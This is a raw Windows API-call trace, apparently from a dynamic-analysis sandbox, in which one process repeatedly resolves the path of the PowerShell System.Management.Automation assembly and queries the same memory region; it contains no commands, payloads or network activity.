	[0379.110] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.110] VirtualQuery (in: lpAddress=0x14b110, lpBuffer=0x14bfd0, dwLength=0x30 | out: lpBuffer=0x14bfd0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.110] VirtualQuery (in: lpAddress=0x14b1a0, lpBuffer=0x14c060, dwLength=0x30 | out: lpBuffer=0x14c060*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.110] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.110] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.110] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.110] VirtualQuery (in: lpAddress=0x14b110, lpBuffer=0x14bfd0, dwLength=0x30 | out: lpBuffer=0x14bfd0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.111] VirtualQuery (in: lpAddress=0x14b1a0, lpBuffer=0x14c060, dwLength=0x30 | out: lpBuffer=0x14c060*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.112] VirtualQuery (in: lpAddress=0x14bbb0, lpBuffer=0x14ca70, dwLength=0x30 | out: lpBuffer=0x14ca70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14be20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14be20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14be20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14be20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.114] VirtualQuery (in: lpAddress=0x14bbb0, lpBuffer=0x14ca70, dwLength=0x30 | out: lpBuffer=0x14ca70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14be20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14be20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14be20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14be20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.445] VirtualQuery (in: lpAddress=0x14bbb0, lpBuffer=0x14ca70, dwLength=0x30 | out: lpBuffer=0x14ca70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.445] VirtualQuery (in: lpAddress=0x14bbb0, lpBuffer=0x14ca70, dwLength=0x30 | out: lpBuffer=0x14ca70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.446] VirtualQuery (in: lpAddress=0x14b2a0, lpBuffer=0x14c160, dwLength=0x30 | out: lpBuffer=0x14c160*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.446] VirtualQuery (in: lpAddress=0x14b330, lpBuffer=0x14c1f0, dwLength=0x30 | out: lpBuffer=0x14c1f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.446] VirtualQuery (in: lpAddress=0x14ba10, lpBuffer=0x14c8d0, dwLength=0x30 | out: lpBuffer=0x14c8d0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.446] VirtualQuery (in: lpAddress=0x14baa0, lpBuffer=0x14c960, dwLength=0x30 | out: lpBuffer=0x14c960*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.446] VirtualQuery (in: lpAddress=0x14ba10, lpBuffer=0x14c8d0, dwLength=0x30 | out: lpBuffer=0x14c8d0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.446] VirtualQuery (in: lpAddress=0x14baa0, lpBuffer=0x14c960, dwLength=0x30 | out: lpBuffer=0x14c960*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.446] VirtualQuery (in: lpAddress=0x14baa0, lpBuffer=0x14c960, dwLength=0x30 | out: lpBuffer=0x14c960*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.446] VirtualQuery (in: lpAddress=0x14ba10, lpBuffer=0x14c8d0, dwLength=0x30 | out: lpBuffer=0x14c8d0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
